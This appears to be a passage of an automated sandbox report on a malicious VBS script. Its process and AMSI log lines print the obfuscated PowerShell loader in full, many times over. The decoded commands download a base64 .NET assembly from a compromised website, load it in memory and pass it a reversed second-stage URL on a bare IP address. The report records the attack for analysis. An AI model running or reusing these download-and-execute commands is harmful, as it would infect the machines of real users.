                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $ExeNy = 'J?Bz?HE?YQBh?Go?I??9?C??Jw?w?DE?Mw?n?Ds?J?B3?Gk?a?Bs?HY?I??9?C??Jw?l?H??egBB?GM?TwBn?Ek?bgBN?HI?JQ?n?Ds?WwBC?Hk?d?Bl?Fs?XQBd?C??J?Bu?G4?dQBv?GE?I??9?C??WwBz?Hk?cwB0?GU?bQ?u?EM?bwBu?HY?ZQBy?HQ?XQ?6?Do?RgBy?G8?bQBC?GE?cwBl?DY?N?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?HM?Og?v?C8?dwB3?Hc?LgBp?G4?ZgBv?HI?bQBh?GM?aQBv?G4?bwBw?G8?cgB0?HU?bgBh?C4?YwBv?G0?LwB3?H??LQBj?G8?bgB0?GU?bgB0?C8?dQBw?Gw?bwBh?GQ?cw?v?DI?M??y?DQ?Lw?w?Dk?LwBk?Gw?b?Bz?Gs?eQBm?GE?b??u?HQ?e?B0?Cc?KQ?p?Ds?WwBz?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bu?G4?dQBv?GE?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?EM?b?Bh?HM?cwBM?Gk?YgBy?GE?cgB5?DE?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?WgB4?Es?S?BH?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?MQBT?EQ?LwBT?FY?TgBF?C8?egBy?GE?TQ?v?Gc?ZQBS?C8?awBh?FQ?Lw?5?DY?MQ?u?DM?Mw?y?C4?Mg?w?DI?Lg?x?Dk?Lw?v?Do?c?B0?HQ?a??n?C??L??g?CQ?dwBp?Gg?b?B2?C??L??g?Cc?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?C0?LQ?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?C0?Jw?s?C??J?Bz?HE?YQBh?Go?L??g?Cc?MQ?n?Cw?I??n?FI?bwBk?GE?Jw?g?Ck?KQ?7??==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;$global:?
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $ExeNy = 'J?Bz?HE?YQBh?Go?I??9?C??Jw?w?DE?Mw?n?Ds?J?B3?Gk?a?Bs?HY?I??9?C??Jw?l?H??egBB?GM?TwBn?Ek?bgBN?HI?JQ?n?Ds?WwBC?Hk?d?Bl?Fs?XQBd?C??J?Bu?G4?dQBv?GE?I??9?C??WwBz?Hk?cwB0?GU?bQ?u?EM?bwBu?HY?ZQBy?HQ?XQ?6?Do?RgBy?G8?bQBC?GE?cwBl?DY?N?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?HM?Og?v?C8?dwB3?Hc?LgBp?G4?ZgBv?HI?bQBh?GM?aQBv?G4?bwBw?G8?cgB0?HU?bgBh?C4?YwBv?G0?LwB3?H??LQBj?G8?bgB0?GU?bgB0?C8?dQBw?Gw?bwBh?GQ?cw?v?DI?M??y?DQ?Lw?w?Dk?LwBk?Gw?b?Bz?Gs?eQBm?GE?b??u?HQ?e?B0?Cc?KQ?p?Ds?WwBz?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bu?G4?dQBv?GE?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?EM?b?Bh?HM?cwBM?Gk?YgBy?GE?cgB5?DE?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?WgB4?Es?S?BH?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?MQBT?EQ?LwBT?FY?TgBF?C8?egBy?GE?TQ?v?Gc?ZQBS?C8?awBh?FQ?Lw?5?DY?MQ?u?DM?Mw?y?C4?Mg?w?DI?Lg?x?Dk?Lw?v?Do?c?B0?HQ?a??n?C??L??g?CQ?dwBp?Gg?b?B2?C??L??g?Cc?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?C0?LQ?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?C0?Jw?s?C??J?Bz?HE?YQBh?Go?L??g?Cc?MQ?n?Cw?I??n?FI?bwBk?GE?Jw?g?Ck?KQ?7??==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;$global:?
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $ExeNy = 'J?Bz?HE?YQBh?Go?I??9?C??Jw?w?DE?Mw?n?Ds?J?B3?Gk?a?Bs?HY?I??9?C??Jw?l?H??egBB?GM?TwBn?Ek?bgBN?HI?JQ?n?Ds?WwBC?Hk?d?Bl?Fs?XQBd?C??J?Bu?G4?dQBv?GE?I??9?C??WwBz?Hk?cwB0?GU?bQ?u?EM?bwBu?HY?ZQBy?HQ?XQ?6?Do?RgBy?G8?bQBC?GE?cwBl?DY?N?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?HM?Og?v?C8?dwB3?Hc?LgBp?G4?ZgBv?HI?bQBh?GM?aQBv?G4?bwBw?G8?cgB0?HU?bgBh?C4?YwBv?G0?LwB3?H??LQBj?G8?bgB0?GU?bgB0?C8?dQBw?Gw?bwBh?GQ?cw?v?DI?M??y?DQ?Lw?w?Dk?LwBk?Gw?b?Bz?Gs?eQBm?GE?b??u?HQ?e?B0?Cc?KQ?p?Ds?WwBz?Hk?cwB0?GU?bQ?u?EE?c?Bw?EQ?bwBt?GE?aQBu?F0?Og?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?J?Bu?G4?dQBv?GE?KQ?u?Ec?ZQB0?FQ?eQBw?GU?K??n?EM?b?Bh?HM?cwBM?Gk?YgBy?GE?cgB5?DE?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?WgB4?Es?S?BH?Cc?KQ?u?Ek?bgB2?G8?awBl?Cg?J?Bu?HU?b?Bs?Cw?I?Bb?G8?YgBq?GU?YwB0?Fs?XQBd?C??K??n?HQ?e?B0?C4?MQBT?EQ?LwBT?FY?TgBF?C8?egBy?GE?TQ?v?Gc?ZQBS?C8?awBh?FQ?Lw?5?DY?MQ?u?DM?Mw?y?C4?Mg?w?DI?Lg?x?Dk?Lw?v?Do?c?B0?HQ?a??n?C??L??g?CQ?dwBp?Gg?b?B2?C??L??g?Cc?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?C0?LQ?t?C0?LQ?t?C0?LQ?t?C0?LQ?t?C0?Jw?s?C??J?Bz?HE?YQBh?Go?L??g?Cc?MQ?n?Cw?I??n?FI?bwBk?GE?Jw?g?Ck?KQ?7??==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' "
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF848D400BD pushad ; iretd 1_2_00007FF848D400C1
